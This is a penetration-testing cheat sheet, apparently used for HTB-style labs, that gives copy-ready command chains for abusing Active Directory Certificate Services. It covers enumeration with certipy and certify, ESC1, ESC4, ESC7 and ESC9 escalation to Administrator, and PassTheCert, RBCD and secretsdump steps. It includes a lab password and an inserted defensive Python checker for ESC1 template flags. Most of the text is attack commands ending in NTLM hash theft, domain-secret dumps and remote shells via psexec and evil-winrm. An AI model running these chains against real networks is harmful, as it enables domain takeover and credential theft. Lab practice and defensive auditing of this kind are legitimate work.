Enum (From Linux)
# Password
certipy-ad find -u '<USER>' -p '<PASSWORD>' -target <TARGET> -text -stdout -vulnerable
Sample Output:
TO-DO
# NTLM
certipy-ad find -u '<USER>' -hashes '<HASH>' -target <TARGET> -text -stdout -vulnerable
Sample Output:
TO-DO
# Password
nxc ldap <TARGET> -u '<USER>' -p '<PASSWORD>' -M adcs
Sample Output:
TO-DO
# NTLM
nxc ldap <TARGET> -u '<USER>' -H '<HASH>' -M adcs
Sample Output:
TO-DO
Enum (From Windows)
# Check ADCS service
net start | findstr /i cert
Sample Output:
TO-DO
# Check env
certutil
Sample Output:
TO-DO
# List cert templates
certutil -catemplates
Sample Output:
TO-DO
# Get info of each template
.\certify.exe find
Sample Output:
TO-DO
# Find vuln templates
.\certify.exe find /vulnerable /currentuser
Sample Output:
TO-DO
# Import ADCSTemplate module
import-module .\ADCSTemplate.psm1
Sample Output:
TO-DO
# List templates
get-adcstemplate | fl displayname
Sample Output:
TO-DO
Ref: ADCSTemplate
Request a Personal Information Exchange File (.pfx)
1. Request a pfx
certipy-ad req -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -ca <CA> -template User -target <DC> -pfx '<USER>.pfx'
Sample Output:
$ certipy-ad req -u 'oorend@rebound.htb' -p '1GR8t@$$4u' -ca rebound-DC01-CA -template User -target dc01.rebound.htb -pfx oorend.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 7
[*] Got certificate with UPN 'oorend@rebound.htb'
[*] Certificate object SID is 'S-1-5-21-4078382237-1492182817-2568127209-7682'
[*] Saved certificate and private key to 'oorend.pfx'
2. Get NTLM Hash with pfx
sudo ntpdate -s <DC> && certipy-ad auth -pfx '<USER>.pfx'
Sample Output:
TO-DO
1. Request a Certificate
.\certify.exe request /ca:<CA> /template:User
Sample Output:
TO-DO
2. Convert pem to pfx
# Copy -----BEGIN RSA PRIVATE KEY----- ...[SNIP]... -----END CERTIFICATE----- to cert.pem
openssl pkcs12 -in cert.pem -keyex -CSP 'Microsoft Enhanced Cryptographic Provider v1.0' -export -out cert.pfx
Sample Output:
TO-DO
3. Get NTLM Hash with pfx
.\rubeus.exe asktgt /user:'<USER>' /certificate:cert.pfx /getcredentials /show /nowrap
Sample Output:
TO-DO
ESC1
+----------------------------------------------------------+
| Enabled                        : True                    |
| Client Authentication          : True                    |
| Enrollee Supplies Subject      : True                    |
| Certificate Name Flag          : EnrolleeSuppliesSubject |
| Requires Management Approval   : False                   |
| Authorized Signatures Required : 0                       |
+----------------------------------------------------------+
Sample Output:
TO-DO
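Added audit helper (not part of this cheat sheet or of Certipy/Certify): it evaluates the ESC1 preconditions in the box above against a template's pKICertificateTemplate LDAP attributes, using the 0x1 bit of msPKI-Certificate-Name-Flag (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT). The attribute names and flag bits are the real AD CS ones; the two sample templates are constructed, and enrollment rights (an ACL question) are out of scope.

```python
# Bit in msPKI-Certificate-Name-Flag: CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
ENROLLEE_SUPPLIES_SUBJECT = 0x1
# Bit in msPKI-Enrollment-Flag: CT_FLAG_PEND_ALL_REQUESTS (CA manager approval)
PEND_ALL_REQUESTS = 0x2
# EKUs that allow a certificate to authenticate a principal to AD
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}


def check_esc1(template: dict, enabled: bool) -> dict:
    """Evaluate the ESC1 preconditions for one template.

    template: pKICertificateTemplate attributes as read from LDAP.
    enabled:  whether a CA publishes the template (certificateTemplates
              on its pKIEnrollmentService object).
    """
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    name_flag = int(template.get("msPKI-Certificate-Name-Flag", 0))
    enroll_flag = int(template.get("msPKI-Enrollment-Flag", 0))
    conditions = {
        "Enabled": enabled,
        # An empty EKU list means the certificate is usable for any purpose
        "Client Authentication": not ekus or bool(ekus & CLIENT_AUTH_EKUS),
        "Enrollee Supplies Subject": bool(name_flag & ENROLLEE_SUPPLIES_SUBJECT),
        "Requires Management Approval": bool(enroll_flag & PEND_ALL_REQUESTS),
        "Authorized Signatures Required": int(template.get("msPKI-RA-Signature", 0)),
    }
    esc1 = (conditions["Enabled"]
            and conditions["Client Authentication"]
            and conditions["Enrollee Supplies Subject"]
            and not conditions["Requires Management Approval"]
            and conditions["Authorized Signatures Required"] == 0)
    return {"conditions": conditions, "esc1": esc1}


# Constructed sample: a template matching every row of the ESC1 box
VULN_TEMPLATE = {
    "msPKI-Certificate-Name-Flag": 0x1,
    "msPKI-Enrollment-Flag": 0x0,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
}
# Same template hardened: subject built by the CA from AD, manager approval on
HARDENED_TEMPLATE = {**VULN_TEMPLATE,
                     "msPKI-Certificate-Name-Flag": 0x0,
                     "msPKI-Enrollment-Flag": PEND_ALL_REQUESTS}

if __name__ == "__main__":
    for name, tpl in (("vuln", VULN_TEMPLATE), ("hardened", HARDENED_TEMPLATE)):
        print(name, check_esc1(tpl, enabled=True))
```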
Abuse #1: Add Smartcard Logon
1. Import Modules
. .\PowerView.ps1
Sample Output:
TO-DO
. .\ADCS.ps1
Sample Output:
TO-DO
2. Add Smartcard Logon
Get-SmartCardCertificate -Identity Administrator -TemplateName <VULN_TEMPLATE> -NoSmartCard -Verbose
Sample Output:
TO-DO
3. Get Cert_Thumbprint
Get-ChildItem cert:\currentuser\my -recurse
Sample Output:
TO-DO
4. Get NTLM hash
.\rubeus.exe asktgt /user:Administrator /certificate:<THUMBPRINT> /getcredentials /show /nowrap
Sample Output:
TO-DO
5. Remote
impacket-psexec -hashes :<HASH> administrator@<DOMAIN> cmd.exe
Sample Output:
TO-DO
Ref: PoshADCS
Abuse #2: Set Alternative Name
1. Generate a Cert with Altname
certipy-ad req -u '<USER>' -p '<PASSWORD>' -target <TARGET> -upn administrator@<DOMAIN> -ca <CA> -template <VULN_TEMPLATE>
Sample Output:
TO-DO
2. Get NTLM Hash
sudo ntpdate -s <DC> && certipy-ad auth -pfx administrator.pfx
Sample Output:
TO-DO
3. Remote
evil-winrm -i <TARGET> -u administrator -H <HASH>
Sample Output:
TO-DO
1. Generate a Cert with Altname
.\certify.exe request /ca:<CA> /template:<VULN_TEMPLATE> /altname:administrator
Sample Output:
TO-DO
2. Convert pem to pfx
# Copy -----BEGIN RSA PRIVATE KEY----- ...[SNIP]... -----END CERTIFICATE----- to cert.pem
openssl pkcs12 -in cert.pem -keyex -CSP 'Microsoft Enhanced Cryptographic Provider v1.0' -export -out administrator.pfx
Sample Output:
TO-DO
3. Get NTLM Hash
.\rubeus.exe asktgt /user:Administrator /certificate:administrator.pfx /getcredentials /show /nowrap
Sample Output:
TO-DO
4. Remote
# Remote
impacket-psexec -hashes :<HASH> administrator@<DOMAIN> cmd.exe
Sample Output:
TO-DO
Abuse #3: Set msPKI-Certificate-Name-Flag
1. Import ADCSTemplate Module
import-module .\ADCSTemplate.psm1
Sample Output:
TO-DO
2. Create Template with msPKI-Certificate-Name-Flag Modified
Export-ADCSTemplate -displayName <VULN_TEMPLATE> > template.json
Sample Output:
TO-DO
$template = cat template.json -raw | ConvertFrom-Json
Sample Output:
TO-DO
$template.'msPKI-Certificate-Name-Flag' = 0x1
Sample Output:
TO-DO
$template | ConvertTo-Json | Set-Content template_mod.json
Sample Output:
TO-DO
3. Create a New Certificate Template
New-ADCSTemplate -DisplayName 'vuln_esc1' -Publish -JSON (cat template_mod.json -raw)
Sample Output:
TO-DO
4. Allow the User to Enroll in the Certificate
# Set permissions on the new template to allow a specific user to enroll in the certificate
Set-ADCSTemplateACL -DisplayName 'vuln_esc1' -type allow -identity '<DOMAIN>\<USER>' -enroll
Sample Output:
TO-DO
5. Request a Cert with Altname
.\certify.exe request /ca:<CA> /template:vuln_esc1 /altname:administrator
Sample Output:
TO-DO
6. Get NTLM Hash
.\rubeus.exe asktgt /user:Administrator /certificate:administrator.pfx /getcredentials /show /nowrap
Sample Output:
TO-DO
7. Remote
impacket-psexec -hashes :<HASH> administrator@<DOMAIN> cmd.exe
Sample Output:
TO-DO
Ref: ADCSTemplate
ESC4
1. Update Template
certipy-ad template -username '<USER>' -hashes '<HASH>' -template '<TEMPLATE>' -target <TARGET> -save-old
Sample Output:
TO-DO
2. Request a Cert Based on the ESC4 Template
certipy-ad req -username '<USER>' -hashes '<HASH>' -template '<TEMPLATE>' -target <TARGET> -ca <CA> -upn administrator@<DOMAIN>
Sample Output:
TO-DO
3. Get NTLM Hash
certipy-ad auth -pfx administrator.pfx -dc-ip <DC_IP>
Sample Output:
TO-DO
4. Remote
evil-winrm -i <TARGET> -u administrator -H <HASH>
Sample Output:
TO-DO
ESC7
+---------------------+
| Access Right        |
|=====================|
| Manage CA           |
| Manage Certificates |
+---------------------+
Sample Output:
TO-DO
1. Use ManageCA Privilege to Add Manage Certificates Permission
certipy-ad ca -ca <CA> -add-officer '<USER>' -u '<USER>@<DOMAIN>' -p '<PASSWORD>'
Sample Output:
TO-DO
# Check
certipy-ad find -dc-ip <DC> -ns <DC_IP> -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -vulnerable -stdout
Sample Output:
TO-DO
2. Request a Cert Based on SubCA
# Take note of the Request ID
certipy-ad req -ca <CA> -target <TARGET_DOMAIN> -template SubCA -upn administrator@<DOMAIN> -u '<USER>@<DOMAIN>' -p '<PASSWORD>'
Sample Output:
TO-DO
3. Issue Request Using ManageCA and Manage Certificates Privilege
certipy-ad ca -ca <CA> -issue-request <REQUEST_ID> -u '<USER>@<DOMAIN>' -p '<PASSWORD>'
Sample Output:
TO-DO
4. Request a Certificate from CA on the Target Domain
certipy-ad req -ca <CA> -target <TARGET_DOMAIN> -retrieve <REQUEST_ID> -u '<USER>@<DOMAIN>' -p '<PASSWORD>'
Sample Output:
TO-DO
5. Get NTLM Hash
certipy-ad auth -pfx administrator.pfx -dc-ip <DC>
Sample Output:
TO-DO
6. Remote
evil-winrm -i <TARGET> -u administrator -H <HASH>
Sample Output:
TO-DO
ESC9
1. Modify Target User’s userPrincipalName (With GenericAll/GenericWrite)
# Password
certipy-ad account update -username '<USER>@<DOMAIN>' -password '<PASSWORD>' -user <TARGET_USER> -upn Administrator
Sample Output:
TO-DO
# NTLM
certipy-ad account update -username '<USER>@<DOMAIN>' -hashes <HASH> -user <TARGET_USER> -upn Administrator
Sample Output:
TO-DO
2. Request a Cert of Target User
# Password
certipy-ad req -username '<TARGET_USER>@<DOMAIN>' -password '<PASSWORD>' -ca <CA> -template <VULN_TEMPLATE>
Sample Output:
TO-DO
# NTLM
certipy-ad req -username '<TARGET_USER>@<DOMAIN>' -hashes <HASH> -ca <CA> -template <VULN_TEMPLATE>
Sample Output:
TO-DO
3. Change Back Target User’s userPrincipalName
# Password
certipy-ad account update -username '<USER>@<DOMAIN>' -password '<PASSWORD>' -user <TARGET_USER> -upn '<TARGET_USER>@<DOMAIN>'
Sample Output:
TO-DO
# NTLM
certipy-ad account update -username '<USER>@<DOMAIN>' -hashes <HASH> -user <TARGET_USER> -upn '<TARGET_USER>@<DOMAIN>'
Sample Output:
TO-DO
4. Get NTLM Hash
certipy-ad auth -pfx administrator.pfx -domain certified.htb
Sample Output:
TO-DO
5. Remote
evil-winrm -i <TARGET> -u administrator -H <HASH>
Sample Output:
TO-DO
Workaround: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP
1. Create Key and Cert from pfx
certipy-ad cert -pfx '<USER>.pfx' -nocert -out '<USER>.key'
Sample Output:
TO-DO
certipy-ad cert -pfx '<USER>.pfx' -nokey -out '<USER>.crt'
Sample Output:
TO-DO
1. Get an LDAP Shell
python3 PassTheCert/Python/passthecert.py -action ldap-shell -crt '<USER>.crt' -key '<USER>.key' -domain <DOMAIN> -dc-ip <DC>
Sample Output:
TO-DO
2. Add User to Administrators Group
add_user_to_group '<USER>' administrators
Sample Output:
TO-DO
3. Remote
evil-winrm -i <TARGET_DOMAIN> -u '<USER>' -p '<PASSWORD>'
Sample Output:
TO-DO
Ref: PassTheCert
1. RBCD Attack
python3 PassTheCert/Python/passthecert.py -action write_rbcd -delegate-to '<TARGET_COMPUTER>$' -delegate-from 'Evil_Computer$' -crt administrator.crt -key administrator.key -domain <DOMAIN> -dc-ip <DC>
Sample Output:
TO-DO
2. Request a Service Ticket
sudo ntpdate -s <DC> && impacket-getST -spn 'cifs/<TARGET_DOMAIN>' -impersonate Administrator '<DOMAIN>/Evil_Computer$:<GENERATED_PASSWORD>'
Sample Output:
TO-DO
3. Secrets Dump
export KRB5CCNAME=Administrator.ccache
Sample Output:
TO-DO
impacket-secretsdump '<DOMAIN>/administrator@<TARGET_DOMAIN>' -k -no-pass -just-dc-ntlm
Sample Output:
TO-DO
4. Remote
evil-winrm -i <TARGET_DOMAIN> -u administrator -H <HASH>
Sample Output:
TO-DO
Ref: PassTheCert